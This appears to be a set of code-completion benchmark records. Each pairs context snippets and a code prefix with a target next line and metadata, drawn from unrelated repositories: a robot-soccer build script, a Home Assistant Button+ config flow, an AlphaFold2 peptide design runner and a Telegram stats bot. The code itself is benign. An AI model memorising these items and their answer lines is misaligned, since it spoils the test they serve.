'config.json' is empty. Manually verify and delete if still empty.\")\n exit()\n \n with open(\"config.json\", \"r\") as f:\n self.options = json.loads(f.read())\n\n\n @staticmethod\n def build_cpp_modules(special_environment_prefix=[], exit_on_build=False):\n '''\n Build C++ modules in folder /cpp using Pybind11\n \n Parameters\n ----------\n special_environment_prefix : `list`\n command prefix to run a given command in the desired environment\n useful to compile C++ modules for different python interpreter versions (other than default version)\n Conda Env. 
example: ['conda', 'run', '-n', 'myEnv']\n If [] the default python interpreter is used as compilation target\n exit_on_build : bool\n exit if there is something to build (so that only 1 player per team builds c++ modules)\n '''\n cpp_path = Script.ROOT_DIR + \"/cpp/\"\n exclusions = [\"__pycache__\"]\n\n cpp_modules = [d for d in listdir(cpp_path) if isdir(join(cpp_path, d)) and d not in exclusions]\n\n if not cpp_modules: return #no modules to build\n\n python_cmd = f\"python{sys.version_info.major}.{sys.version_info.minor}\" # \"python3\" can select the wrong version, this prevents that\n\n def init():\n print(\"--------------------------\\nC++ modules:\",cpp_modules)\n\n try:\n process = subprocess.Popen(special_environment_prefix+[python_cmd, \"-m\", \"pybind11\", \"--includes\"], stdout=subprocess.PIPE)\n (includes, err) = process.communicate()\n process.wait()\n except:\n print(f\"Error while executing child program: '{python_cmd} -m pybind11 --includes'\")\n exit()\n\n includes = includes.decode().rstrip() # strip trailing newlines (and other whitespace chars)\n print(\"Using Pybind11 includes: '\",includes,\"'\",sep=\"\")\n return includes\n\n nproc = str(cpu_count())\n zero_modules = True\n\n for module in cpp_modules:\n module_path = join(cpp_path, module)\n\n # skip module if there is no Makefile (typical distribution case)\n if not isfile(join(module_path, \"Makefile\")):\n continue\n\n # skip module in certain conditions\n if isfile(join(module_path, module+\".so\")) and isfile(join(module_path, module+\".c_info\")):\n with open(join(module_path, module+\".c_info\"), 'rb') as f:\n info = pickle.load(f)\n if info == python_cmd:\n code_mod_time = max(getmtime(join(module_path, f)) for f in listdir(module_path) if f.endswith(\".cpp\") or f.endswith(\".h\"))\n bin_mod_time = getmtime(join(module_path, module+\".so\"))\n if bin_mod_time + 30 > code_mod_time: # favor not building with a margin of 30s (scenario: we unzip the fcpy project, including the binaries, the modification times are all similar)\n continue\n\n # init: print stuff & get Pybind11 includes\n if zero_modules:\n if exit_on_build:\n print(\"There are C++ modules to build. This player is not allowed to build. Aborting.\")\n exit()\n zero_modules = False\n includes = init()\n\n # build module\n print(f'{f\"Building: {module}... \":40}',end='',flush=True)\n process = subprocess.Popen(['make', '-j'+nproc, 'PYBIND_INCLUDES='+includes], stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=module_path)\n (output, err) = process.communicate()\n exit_code = process.wait()\n if exit_code == 0:\n print(\"success!\")\n with open(join(module_path, module+\".c_info\"),\"wb\") as f: # save python version\n pickle.dump(python_cmd, f, protocol=4) # protocol 4 is backward compatible with Python 3.4\n else:\n print(\"Aborting! Building errors:\")\n print(output.decode(), err.decode())\n exit() \n\n if not zero_modules:\n print(\"All modules were built successfully!\\n--------------------------\")\n\n\n def batch_create(self, agent_cls, args_per_player): \n ''' Creates batch of agents '''\n\n for a in args_per_player:\n self.players.append( agent_cls(*a) )\n\n def batch_execute_agent(self, index : slice = slice(None)): \n ''' \n Executes agent normally (including commit & send)\n\n Parameters\n ----------\n index : slice\n subset of agents\n (e.g. index=slice(1,2) will select the second agent)\n (e.g. 
index=slice(1,3) will select the second and third agents)\n by default, all agents are selected\n ''' \n for p in self.players[index]:\n p.think_and_send()\n\n def batch_execute_behavior(self, behavior, index : slice = slice(None)):\n '''\n Executes behavior\n\n Parameters\n ----------\n behavior : str\n name of behavior to execute\n index : slice\n subset of agents\n (e.g. index=slice(1,2) will select the second agent)\n (e.g. index=slice(1,3) will select the second and third agents)\n by default, all agents are selected\n '''\n for p in self.players[index]:\n p.behavior.execute(behavior)\n\n def batch_commit_and_send(self, index : slice = slice(None)):\n '''\n Commits & sends data to server\n\n Parameters\n ----------\n index : slice\n subset of agents\n (e.g. index=slice(1,2) will select the second agent)\n (e.g. index=slice(1,3) will select the second and third agents)\n by default, all agents are selected\n '''\n for p in self.players[index]:\n p.scom.commit_and_send( p.world.robot.get_command() ) \n\n def batch_receive(self, index : slice = slice(None), update=True):\n ''' \n Waits for server messages\n\n Parameters\n ----------\n index : slice\n subset of agents\n (e.g. index=slice(1,2) will select the second agent)\n (e.g. index=slice(1,3) will select the second and third agents)\n by default, all agents are selected\n update : bool\n update world state based on information received from server\n if False, the agent becomes unaware of itself and its surroundings\n which is useful for reducing cpu resources for dummy agents in demonstrations\n '''\n for p in self.players[index]:\n p.scom.receive(update)\n\n def batch_commit_beam(self, pos2d_and_rotation, index : slice = slice(None)):\n '''\n Beam all player to 2D position with a given rotation\n\n Parameters\n ----------\n pos2d_and_rotation : `list`\n iterable of 2D positions and rotations e.g. [(0,0,45),(-5,0,90)]\n index : slice\n subset of agents\n (e.g. index=slice(1,2) will select the second agent)\n (e.g. index=slice(1,3) will select the second and third agents)\n by default, all agents are selected\n ''' \n for p, pos_rot in zip(self.players[index], pos2d_and_rotation): \n p.scom.commit_beam(pos_rot[0:2],pos_rot[2])\n\n def batch_unofficial_beam(self, pos3d_and_rotation, index : slice = slice(None)):\n '''\n Beam all player to 3D position with a given rotation\n\n Parameters\n ----------\n pos3d_and_rotation : `list`\n iterable of 3D positions and rotations e.g. [(0,0,0.5,45),(-5,0,0.5,90)]\n index : slice\n subset of agents\n (e.g. index=slice(1,2) will select the second agent)\n (e.g. index=slice(1,3) will select the second and third agents)\n by default, all agents are selected\n ''' \n for p, pos_rot in zip(self.players[index], pos3d_and_rotation): \n p.scom.unofficial_beam(pos_rot[0:3],pos_rot[3])\n\n def batch_terminate(self, index : slice = slice(None)):\n '''\n Close all sockets connected to the agent port\n For scripts where the agent lives until the application ends, this is not needed\n\n Parameters\n ----------\n index : slice\n subset of agents\n (e.g. index=slice(1,2) will select the second agent)\n (e.g. index=slice(1,3) will select the second and third agents)\n by default, all agents are selected\n '''\n for p in self.players[index]:\n p.terminate()\n del self.players[index] # delete selection"
}
] | from agent.Base_Agent import Base_Agent as Agent
from itertools import count
from scripts.commons.Script import Script
import numpy as np | 3,600 |
'''
Objective:
----------
Fall and get up
'''
class Get_Up():
|
'''
Objective:
----------
Fall and get up
'''
class Get_Up(): | def __init__(self, script:Script) -> None: | 1 | 2023-12-16 23:40:23+00:00 | 4k |
koenhendriks/ha-button-plus | custom_components/button_plus/config_flow.py | [
{
"identifier": "ApiClient",
"path": "custom_components/button_plus/button_plus_api/api_client.py",
"snippet": "class ApiClient:\n \"\"\" Client to talk to Button+ website \"\"\"\n\n def __init__(self, session, cookie=None) -> None:\n _LOGGER.debug(f\"DEBUG CONFIG {cookie}\")\n self._base = \"https://api.button.plus\"\n self._session = session\n\n if not cookie:\n cookie = \"\"\n\n self._cookie = cookie\n self._headers = {\n 'authority': 'api.button.plus',\n 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',\n 'accept-language': 'en-NL,en-US;q=0.9,en;q=0.8,nl-NL;q=0.7,nl;q=0.6,en-GB;q=0.5',\n 'cache-control': 'no-cache',\n 'cookie': self._cookie,\n }\n\n _LOGGER.debug(f\"Initialize Button+ API client\")\n\n async def test_connection(self):\n url = f\"{self._base}/button/buttons\"\n _LOGGER.debug(f\"test_connection on {url}\")\n async with self._session.get(url, headers=self._headers) as response:\n _LOGGER.debug(f\"Fetch website validation = {response.status} {response}\")\n return 200 <= response.status < 300\n\n async def fetch_config(self, config=int):\n url = f\"{self._base}/button/config/{config}\"\n _LOGGER.debug(f\"fetch_config {url}\")\n async with self._session.get(url, headers=self._headers) as response:\n return await response.text()\n\n async def fetch_configs(self):\n url = f\"{self._base}/button/buttons\"\n _LOGGER.debug(f\"fetch_configs {url}\")\n async with self._session.get(url, headers=self._headers) as response:\n return await response.text()\n\n async def get_cookie_from_login(self, email=str, password=str):\n url = f\"{self._base}/account/login\"\n data = {\"email\": email, \"password\": password, \"remember\": True}\n json_data = json.dumps(data)\n _LOGGER.debug(f\"json dump: {json_data}\")\n headers = {\n 'accept': '*/*',\n 'accept-language': 'en-NL,en;q=0.9',\n 'content-type': 'application/json',\n 'origin': 'https://button.plus',\n 'referer': 'https://button.plus/',\n 'user-agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36'\n }\n\n async with self._session.post(url, data=json_data, headers=headers) as response:\n response_body = await response.text()\n\n if not response.cookies:\n raise Exception(f\"Login error with username and password, response: {response_body}\")\n\n cookie_string = str(response.cookies)\n match = re.search(r'auth_cookie=[^;]+', cookie_string)\n\n auth_cookie = match.group()\n\n return auth_cookie"
},
{
"identifier": "LocalApiClient",
"path": "custom_components/button_plus/button_plus_api/local_api_client.py",
"snippet": "class LocalApiClient:\n \"\"\" Client to talk to Button+ local devices \"\"\"\n\n def __init__(self, ip_address, session) -> None:\n self._base = f\"http://{ip_address}\"\n self._session = session\n\n _LOGGER.debug(f\"Initialize Button+ local API client\")\n\n async def fetch_config(self):\n url = f\"{self._base}/config\"\n _LOGGER.debug(f\"fetch_config {url}\")\n async with self._session.get(url) as response:\n return await response.text()\n\n async def push_config(self, config):\n url = f\"{self._base}/configsave\"\n _LOGGER.debug(f\"push_config {url}\")\n async with self._session.post(url, data=config.to_json()) as response:\n return await response.text()"
},
{
"identifier": "DeviceConfiguration",
"path": "custom_components/button_plus/button_plus_api/model.py",
"snippet": "class DeviceConfiguration:\n def __init__(self, info: Info, core: Core, mqtt_buttons: List[MqttButton], mqtt_displays: List[MqttDisplay],\n mqtt_brokers: List[MqttBroker], mqtt_sensors: List[MqttSensor]):\n self.info = info\n self.core = core\n self.mqtt_buttons = mqtt_buttons\n self.mqtt_displays = mqtt_displays\n self.mqtt_brokers = mqtt_brokers\n self.mqtt_sensors = mqtt_sensors\n\n @staticmethod\n def from_json(json_data: str) -> 'DeviceConfiguration':\n data = json.loads(json_data)\n return DeviceConfiguration(\n info=Info.from_dict(data['info']),\n core=Core.from_dict(data['core']),\n mqtt_buttons=[MqttButton.from_dict(button) for button in data['mqttbuttons']],\n mqtt_displays=[MqttDisplay.from_dict(display) for display in data['mqttdisplays']],\n mqtt_brokers=[MqttBroker.from_dict(broker) for broker in data['mqttbrokers']],\n mqtt_sensors=[MqttSensor.from_dict(sensor) for sensor in data['mqttsensors']],\n )\n\n def to_json(self) -> str:\n def serialize(obj):\n if hasattr(obj, '__dict__'):\n d = obj.__dict__.copy()\n\n # Convert the root keys\n if isinstance(obj, DeviceConfiguration):\n d['mqttbuttons'] = [serialize(button) for button in d.pop('mqtt_buttons')]\n d['mqttdisplays'] = [serialize(display) for display in d.pop('mqtt_displays')]\n d['mqttbrokers'] = [serialize(broker) for broker in d.pop('mqtt_brokers')]\n d['mqttsensors'] = [serialize(sensor) for sensor in d.pop('mqtt_sensors')]\n\n if isinstance(obj, Info):\n d['id'] = d.pop('device_id')\n d['ipaddress'] = d.pop('ip_address')\n d['largedisplay'] = d.pop('large_display')\n\n elif isinstance(obj, Connector):\n d['id'] = d.pop('connector_id')\n d['type'] = d.pop('connector_type')\n\n elif isinstance(obj, Sensor):\n d['sensorid'] = d.pop('sensor_id')\n\n elif isinstance(obj, Core):\n d['autobackup'] = d.pop('auto_backup')\n d['brightnesslargedisplay'] = d.pop('brightness_large_display')\n d['brightnessminidisplay'] = d.pop('brightness_mini_display')\n d['ledcolorfront'] = d.pop('led_color_front')\n d['ledcolorwall'] = d.pop('led_color_wall')\n\n # Custom mappings for MqttButton class\n elif isinstance(obj, MqttButton):\n d['id'] = d.pop('button_id')\n d['toplabel'] = d.pop('top_label')\n d['ledcolorfront'] = d.pop('led_color_front')\n d['ledcolorwall'] = d.pop('led_color_wall')\n d['longdelay'] = d.pop('long_delay')\n d['longrepeat'] = d.pop('long_repeat')\n\n elif isinstance(obj, Topic):\n d['brokerid'] = d.pop('broker_id')\n d['eventtype'] = d.pop('event_type')\n\n elif isinstance(obj, MqttDisplay):\n d['fontsize'] = d.pop('font_size')\n d['topics'] = [serialize(topic) for topic in d['topics']]\n\n elif isinstance(obj, MqttBroker):\n d['brokerid'] = d.pop('broker_id')\n d['wsport'] = d.pop('ws_port')\n\n elif isinstance(obj, MqttSensor):\n d['sensorid'] = d.pop('sensor_id')\n d['topic'] = serialize(d['topic'])\n\n # Filter out None values\n return {k: v for k, v in d.items() if v is not None}\n else:\n return str(obj)\n\n return json.dumps(self, default=serialize, indent=4)"
},
{
"identifier": "MqttBroker",
"path": "custom_components/button_plus/button_plus_api/model.py",
"snippet": "class MqttBroker:\n def __init__(self, broker_id: str, url: str, port: int, ws_port: int, username: str, password: str):\n self.broker_id = broker_id\n self.url = url\n self.port = port\n self.ws_port = ws_port\n self.username = username\n self.password = password\n\n @staticmethod\n def from_dict(data: Dict[str, Any]) -> 'MqttBroker':\n return MqttBroker(\n broker_id=data['brokerid'],\n url=data['url'],\n port=data['port'],\n ws_port=data['wsport'],\n username=data['username'],\n password=data['password']\n )"
},
{
"identifier": "EventType",
"path": "custom_components/button_plus/button_plus_api/event_type.py",
"snippet": "class EventType(int, Enum):\n CLICK = 0\n LONG_PRESS = 1\n BLUE_LED = 8\n RED_LED = 9\n GREEN_LED = 10\n LABEL = 11\n TOPLABEL = 12\n RGB_LED = 13\n LED = 14\n VALUE = 15\n UNIT = 17\n SENSOR_VALUE = 18"
},
{
"identifier": "DOMAIN",
"path": "custom_components/button_plus/const.py",
"snippet": "DOMAIN = \"button_plus\""
}
] | import ipaddress
import json
import logging
import traceback
import voluptuous as vol
from json import JSONDecodeError
from homeassistant import config_entries, exceptions
from homeassistant.const import CONF_IP_ADDRESS, CONF_EMAIL, CONF_PASSWORD, CONF_HOST
from homeassistant.helpers import aiohttp_client
from .button_plus_api.api_client import ApiClient
from .button_plus_api.local_api_client import LocalApiClient
from .button_plus_api.model import DeviceConfiguration, MqttBroker
from .button_plus_api.event_type import EventType
from homeassistant.helpers.network import get_url
from .const import DOMAIN # pylint:disable=unused-import | 2,917 | """Config flow for Hello World integration."""
from __future__ import annotations
_LOGGER = logging.getLogger(__name__)
class ConfigFlow(config_entries.ConfigFlow, domain=DOMAIN):
"""Handle a config flow for Button+."""
local_brokers = [
"core-mosquitto",
"127.0.0.1",
"localhost"
]
def __init__(self):
self.mqtt_entry = None
self.broker_endpoint = None
VERSION = 1
CONNECTION_CLASS = config_entries.CONN_CLASS_LOCAL_PUSH
async def async_step_user(self, user_input=None):
"""Handle the initial Button+ setup, showing the 2 options and checking the MQTT integration."""
errors = {}
mqtt_entries = self.hass.config_entries.async_entries(domain="mqtt")
if len(mqtt_entries) < 1:
mqtt_url = f'{get_url(self.hass)}/config/integrations/integration/mqtt'
return self.async_abort(
reason="mqtt_not_enabled",
description_placeholders={
"mqtt_integration_link": mqtt_url
})
mqtt_entry = mqtt_entries[0]
broker = self.get_mqtt_endpoint(mqtt_entry.data.get("broker"))
broker_port = mqtt_entry.data.get("port")
broker_username = mqtt_entry.data.get("username", "(No authentication)")
self.mqtt_entry = mqtt_entry
if user_input is not None:
self.broker_endpoint = user_input.get("broker", broker)
return await self.async_step_choose_entry()
return self.async_show_form(
step_id="user",
data_schema=vol.Schema({
vol.Required("broker", default=broker): str
}),
errors=errors,
description_placeholders={
"mqtt_broker": broker,
"mqtt_broker_port": broker_port,
"mqtt_user": broker_username
}
)
async def async_step_choose_entry(self, user_input=None):
errors = {}
# if user_input is not None:
return self.async_show_menu(
step_id="choose_entry",
menu_options=["fetch_website", "manual"],
description_placeholders={}
)
async def async_step_manual(self, user_input=None):
""" Handle setting up button plus from manual IP."""
errors = {}
ip = None
if user_input is not None:
ip = user_input.get(CONF_IP_ADDRESS, None)
valid = self.validate_ip(ip)
if valid:
try:
_LOGGER.debug(f"Fetching button+ device at {ip}")
| """Config flow for Hello World integration."""
from __future__ import annotations
_LOGGER = logging.getLogger(__name__)
class ConfigFlow(config_entries.ConfigFlow, domain=DOMAIN):
"""Handle a config flow for Button+."""
local_brokers = [
"core-mosquitto",
"127.0.0.1",
"localhost"
]
def __init__(self):
self.mqtt_entry = None
self.broker_endpoint = None
VERSION = 1
CONNECTION_CLASS = config_entries.CONN_CLASS_LOCAL_PUSH
async def async_step_user(self, user_input=None):
"""Handle the initial Button+ setup, showing the 2 options and checking the MQTT integration."""
errors = {}
mqtt_entries = self.hass.config_entries.async_entries(domain="mqtt")
if len(mqtt_entries) < 1:
mqtt_url = f'{get_url(self.hass)}/config/integrations/integration/mqtt'
return self.async_abort(
reason="mqtt_not_enabled",
description_placeholders={
"mqtt_integration_link": mqtt_url
})
mqtt_entry = mqtt_entries[0]
broker = self.get_mqtt_endpoint(mqtt_entry.data.get("broker"))
broker_port = mqtt_entry.data.get("port")
broker_username = mqtt_entry.data.get("username", "(No authentication)")
self.mqtt_entry = mqtt_entry
if user_input is not None:
self.broker_endpoint = user_input.get("broker", broker)
return await self.async_step_choose_entry()
return self.async_show_form(
step_id="user",
data_schema=vol.Schema({
vol.Required("broker", default=broker): str
}),
errors=errors,
description_placeholders={
"mqtt_broker": broker,
"mqtt_broker_port": broker_port,
"mqtt_user": broker_username
}
)
async def async_step_choose_entry(self, user_input=None):
errors = {}
# if user_input is not None:
return self.async_show_menu(
step_id="choose_entry",
menu_options=["fetch_website", "manual"],
description_placeholders={}
)
async def async_step_manual(self, user_input=None):
""" Handle setting up button plus from manual IP."""
errors = {}
ip = None
if user_input is not None:
ip = user_input.get(CONF_IP_ADDRESS, None)
valid = self.validate_ip(ip)
if valid:
try:
_LOGGER.debug(f"Fetching button+ device at {ip}") | api_client = LocalApiClient(ip, aiohttp_client.async_get_clientsession(self.hass)) | 1 | 2023-12-18 15:14:21+00:00 | 4k |
RosettaCommons/AF2_peptide_hallucination | run.py | [
{
"identifier": "select_positions",
"path": "util/util.py",
"snippet": "def select_positions(n_mutations, boundcomplex, select_positions, select_position_params):\n '''\n Select mutable positions in the binder based on a specific method.\n Returns a dictionary of binder with associated array indicating mutable positions.\n '''\n\n mutable_positions = {}\n\n if select_positions == 'random':\n # Choose positions randomly.\n mutable_positions['binder'] = np.random.choice(range(len(boundcomplex.current_binder_seq)), size=n_mutations, replace=False)\n\n elif select_positions == 'plddt':\n # Choose positions based on lowest plddt in binder sequence.\n # First/last three positions of binder are choice frequency adjusted to avoid picking N/C term every time (they tend to score much lower).\n\n mutate_plddt_quantile = 0.5 # default worst pLDDT quantile to mutate.\n \n # Get plddts from sequence object (binder) \n plddts = boundcomplex.current_prediction_results[\"plddt\"]\n \n # Take just binder segment\n plddts = plddts[:boundcomplex.binder_length,]\n \n # Weights associated with each position in the binder.\n # to account for termini systematically scoring worse in pLDDT.\n weights = np.array([0.25, 0.5, 0.75] + [1] * (boundcomplex.binder_length - 6) + [0.75, 0.5, 0.25])\n\n n_potential = round(boundcomplex.binder_length * mutate_plddt_quantile)\n potential_sites = np.argsort(plddts)[:n_potential]\n\n # Select mutable sites\n sub_w = weights[potential_sites]\n sub_w = [w/np.sum(sub_w) for w in sub_w]\n sites = np.random.choice(potential_sites, size=n_mutations, replace=False, p=sub_w)\n\n mutable_positions['binder'] = sites\n\n return mutable_positions"
},
{
"identifier": "util",
"path": "util/util.py",
"snippet": "def select_positions(n_mutations, boundcomplex, select_positions, select_position_params):\ndef get_aa_freq(AA_freq: dict, exclude_AA: str):\ndef initialize_MCMC(conf):\ndef initialize_score_file(conf) -> None:\ndef append_score_file(i, accepted, T, n_mutations, try_loss, try_scores, conf) -> None:\ndef accept_or_reject(boundcomplex, T, step):\ndef write_outputs(boundcomplex, conf, i) -> None:\ndef relabel_chains(pdb_lines):\n M = np.linspace(int(Mi), int(Mf), conf.hallucination.steps) # stepped linear decay of the mutation rate"
},
{
"identifier": "compute_loss",
"path": "util/loss.py",
"snippet": "def compute_loss(conf, boundcomplex):\n \"\"\"\n Computes losses as defined by the config file\n \"\"\"\n losses=OrderedDict()\n for loss_name in conf:\n loss_function = globals().get(loss_name, None)\n if loss_function is not None and callable(loss_function):\n losses[loss_name] = loss_function(boundcomplex)\n else:\n raise ValueError(f\"Loss function {loss_name} not found\")\n total_loss=combine_loss(losses, conf)\n return total_loss, losses"
}
] | import os
import sys
import numpy as np
import hydra
import copy
from submodules.oligomer_hallucination.oligomer_hallucination import Protomers, Oligomer
from submodules.oligomer_hallucination.oligomer_hallucination import AA_FREQ
from submodules.oligomer_hallucination.modules.af2_net import setup_models, predict_structure
from submodules.oligomer_hallucination.modules.mutations import mutate
from util.util import select_positions
from util import util
from util.loss import compute_loss
from omegaconf import DictConfig, OmegaConf
from hydra.core.hydra_config import HydraConfig | 1,786 |
class BoundComplex(Protomers, Oligomer):
'''
Class for keeping track of binder sequence and complex predictions
during binder hallucination.
'''
def __init__(self, target_sequence: str, name, length=70, aa_freq={}, binder_sequence=None):
"""
target_sequence: amino acid sequence of target peptide (to bind)
length: length of binder peptide
binder_sequence: Optional, starting amino acid sequence of the binder
        aa_freq: dictionary containing the frequency of each amino acid
"""
self.target_seq = target_sequence.upper()
assert len(self.target_seq) > 0, "Target sequence must be provided"
self.length = int(length)
self.aa_freq = aa_freq
# Get initial binder sequence
if binder_sequence:
assert self.length > 0, "Binder length must be greater than 0"
self.init_binder_seq = binder_sequence.upper()
else:
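            # No starting sequence was given, so sample a random one with amino acids drawn according to aa_freq.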
self.init_binder_seq = ''.join(np.random.choice(list(aa_freq.keys()), size = length, p=list(aa_freq.values())))
self.binder_length = len(self.init_binder_seq)
self.target_length = len(self.target_seq)
self.chain_Ls = [self.binder_length, self.target_length]
self.init_bound_seq = self.init_binder_seq + self.target_seq
self.bound_length = len(self.init_bound_seq)
# Initialize current and try sequences,
self.current_binder_seq = self.init_binder_seq
self.try_binder_seq = self.init_binder_seq
self.current_bound_seq = self.init_bound_seq
self.try_seq = self.init_bound_seq
self.name=name
def init_scores(self, scores):
        '''Initialise scores.'''
self.init_scores = scores
self.current_scores = scores
self.try_scores = scores
def update_scores(self):
'''Update current scores to try scores. '''
self.current_scores = self.try_scores
def assign_scores(self, scores):
'''Assign try scores. '''
self.try_scores = scores
def update_scores(self):
'''Update current scores to try scores.'''
self.current_scores = copy.deepcopy(self.try_scores)
@hydra.main(version_base=None, config_path='config', config_name='base')
def main(conf: HydraConfig) -> None:
"""
Main function for running peptide binder hallucination.
"""
input_conf=conf.input
output_conf=conf.output
loss_conf=conf.loss
model_conf=conf.model
hallucination_conf=conf.hallucination
os.makedirs(output_conf.out_dir, exist_ok=True)
if output_conf.cautious and os.path.exists(f'{output_conf.out_dir}/{output_conf.out_prefix}_step_00000.pdb'):
sys.exit(f'Specified output already exists. Exiting. To overwrite, provide output.cautious=False')
AA_freq=util.get_aa_freq(AA_FREQ, hallucination_conf.exclude_AA)
# Initialize BoundComplex object
boundcomplex = BoundComplex(target_sequence=input_conf.target_sequence, name=conf.output.out_prefix, length=input_conf.binder_length, aa_freq=AA_freq, binder_sequence=input_conf.binder_sequence)
# Setup AlphaFold2 models.
model_runners= setup_models(['complex'], model_id=model_conf.model, recycles=model_conf.recycles)
# Initialize MCMC
M, current_loss, current_scores = util.initialize_MCMC(conf)
# Initialize output file
util.initialize_score_file(conf)
# Run the hallucination trajectory
for i in range(hallucination_conf.steps):
# Update a few things.
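        # The temperature decays exponentially: T = T_init * 0.5 ** (i / half_life), i.e. it halves every half_life steps.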
T = hallucination_conf.T_init * (np.exp(np.log(0.5) / hallucination_conf.half_life) ** i) # update temperature
n_mutations = round(M[i]) # update mutation rate
if i == 0:
# Do initial prediction without mutations
print(f"{'-'*100}")
print('Starting...')
af2_prediction= predict_structure(boundcomplex,
single_chain=False,
model_runner=model_runners['complex'],
random_seed=0)
boundcomplex.init_prediction(af2_prediction)
|
class BoundComplex(Protomers, Oligomer):
'''
Class for keeping track of binder sequence and complex predictions
during binder hallucination.
'''
def __init__(self, target_sequence: str, name, length=70, aa_freq={}, binder_sequence=None):
"""
target_sequence: amino acid sequence of target peptide (to bind)
length: length of binder peptide
binder_sequence: Optional, starting amino acid sequence of the binder
        aa_freq: dictionary containing the frequency of each amino acid
"""
self.target_seq = target_sequence.upper()
assert len(self.target_seq) > 0, "Target sequence must be provided"
self.length = int(length)
self.aa_freq = aa_freq
# Get initial binder sequence
if binder_sequence:
assert self.length > 0, "Binder length must be greater than 0"
self.init_binder_seq = binder_sequence.upper()
else:
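            # No starting sequence was given, so sample a random one with amino acids drawn according to aa_freq.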
self.init_binder_seq = ''.join(np.random.choice(list(aa_freq.keys()), size = length, p=list(aa_freq.values())))
self.binder_length = len(self.init_binder_seq)
self.target_length = len(self.target_seq)
self.chain_Ls = [self.binder_length, self.target_length]
self.init_bound_seq = self.init_binder_seq + self.target_seq
self.bound_length = len(self.init_bound_seq)
# Initialize current and try sequences,
self.current_binder_seq = self.init_binder_seq
self.try_binder_seq = self.init_binder_seq
self.current_bound_seq = self.init_bound_seq
self.try_seq = self.init_bound_seq
self.name=name
def init_scores(self, scores):
        '''Initialise scores.'''
self.init_scores = scores
self.current_scores = scores
self.try_scores = scores
def update_scores(self):
'''Update current scores to try scores. '''
self.current_scores = self.try_scores
def assign_scores(self, scores):
'''Assign try scores. '''
self.try_scores = scores
def update_scores(self):
'''Update current scores to try scores.'''
self.current_scores = copy.deepcopy(self.try_scores)
@hydra.main(version_base=None, config_path='config', config_name='base')
def main(conf: HydraConfig) -> None:
"""
Main function for running peptide binder hallucination.
"""
input_conf=conf.input
output_conf=conf.output
loss_conf=conf.loss
model_conf=conf.model
hallucination_conf=conf.hallucination
os.makedirs(output_conf.out_dir, exist_ok=True)
if output_conf.cautious and os.path.exists(f'{output_conf.out_dir}/{output_conf.out_prefix}_step_00000.pdb'):
sys.exit(f'Specified output already exists. Exiting. To overwrite, provide output.cautious=False')
AA_freq=util.get_aa_freq(AA_FREQ, hallucination_conf.exclude_AA)
# Initialize BoundComplex object
boundcomplex = BoundComplex(target_sequence=input_conf.target_sequence, name=conf.output.out_prefix, length=input_conf.binder_length, aa_freq=AA_freq, binder_sequence=input_conf.binder_sequence)
# Setup AlphaFold2 models.
model_runners= setup_models(['complex'], model_id=model_conf.model, recycles=model_conf.recycles)
# Initialize MCMC
M, current_loss, current_scores = util.initialize_MCMC(conf)
# Initialize output file
util.initialize_score_file(conf)
# Run the hallucination trajectory
for i in range(hallucination_conf.steps):
# Update a few things.
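        # The temperature decays exponentially: T = T_init * 0.5 ** (i / half_life), i.e. it halves every half_life steps.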
T = hallucination_conf.T_init * (np.exp(np.log(0.5) / hallucination_conf.half_life) ** i) # update temperature
n_mutations = round(M[i]) # update mutation rate
if i == 0:
# Do initial prediction without mutations
print(f"{'-'*100}")
print('Starting...')
af2_prediction= predict_structure(boundcomplex,
single_chain=False,
model_runner=model_runners['complex'],
random_seed=0)
boundcomplex.init_prediction(af2_prediction) | try_loss, try_scores = compute_loss(loss_conf, boundcomplex) | 2 | 2023-12-21 12:07:25+00:00 | 4k |
Dank-del/stats-bot | stats_bot/__main__.py | [
{
"identifier": "start",
"path": "stats_bot/handlers/start.py",
"snippet": "async def start(update: Update, _: ContextTypes.DEFAULT_TYPE) -> None:\n \"\"\"\n Sends a welcome message to the user.\n\n Args:\n update (Update): The update object containing information about the incoming message.\n context (ContextTypes.DEFAULT_TYPE): The context object containing bot-related information.\n\n Returns:\n None\n\n \"\"\"\n await update.effective_message.reply_text(\n \"Hi! I'm a bot that can generate statistics about your group chat. \"\n \"To get started, add me to your group and send /textstats to see the top 10 users by number of messages and average message length.\"\n )"
},
{
"identifier": "handle_update",
"path": "stats_bot/handlers/group.py",
"snippet": "async def handle_update(update: Update, _: ContextTypes.DEFAULT_TYPE) -> None:\n with Session(engine) as session:\n group = Group(\n id=update.message.chat.id,\n title=update.message.chat.title,\n username=update.message.chat.username,\n type=update.message.chat.type,\n members=await update.message.chat.get_member_count(),\n )\n session.merge(group)\n user = User(\n id=update.message.from_user.id,\n username=update.message.from_user.username,\n first_name=update.message.from_user.first_name,\n last_name=update.message.from_user.last_name,\n )\n session.merge(user)\n if not update.effective_message.from_user.is_bot:\n if update.effective_message.text:\n message = Message(\n user_id=update.message.from_user.id,\n group_id=update.message.chat.id,\n text=update.message.text,\n timestamp=update.message.date,\n )\n session.add(message)\n else:\n media = Attachment(\n user_id=update.message.from_user.id,\n group_id=update.message.chat.id,\n message_id=update.message.message_id,\n media_type=str(type(update.effective_message.effective_attachment))\n .split(\".\")[-1]\n .replace(\"'>\", \"\"),\n timestamp=update.message.date,\n )\n session.add(media)\n session.commit()\n # await update.message.reply_text(f\"You said: {update.message.text}\")"
},
{
"identifier": "attachment_stats",
"path": "stats_bot/handlers/plot.py",
"snippet": "@admin\nasync def attachment_stats(update: Update, context: ContextTypes.DEFAULT_TYPE) -> None:\n \"\"\"\n Generates a table of top 10 users by number of attachments sent,\n and plots a bar chart to visualize the data.\n\n Args:\n update (Update): The update object containing information about the incoming message.\n context (CallbackContext): The context object containing bot-related information.\n\n Returns:\n None\n \"\"\"\n msg = await update.effective_message.reply_text(\"Generating attachment stats...\")\n data = []\n # fetch this data from database\n with Session(engine) as session:\n attachments = session.exec(\n select(Attachment).where(Attachment.group_id == update.effective_chat.id)\n ).all()\n \n users = []\n for attachment in attachments:\n if attachment.user_id not in users:\n users.append(attachment.user_id)\n # print(users)\n for user in users:\n usr = session.exec(select(User).where(User.id == user)).first()\n attchs = session.exec(\n select(Attachment.media_type).where(Attachment.user_id == usr.id)\n ).all()\n data.append((usr.username or str(usr.id), len(attchs)))\n # Create a DataFrame from the attachments data\n df = pd.DataFrame(data, columns=[\"user_id\", \"attachment_count\"])\n \n print(df)\n # Sort the users by attachment count in descending 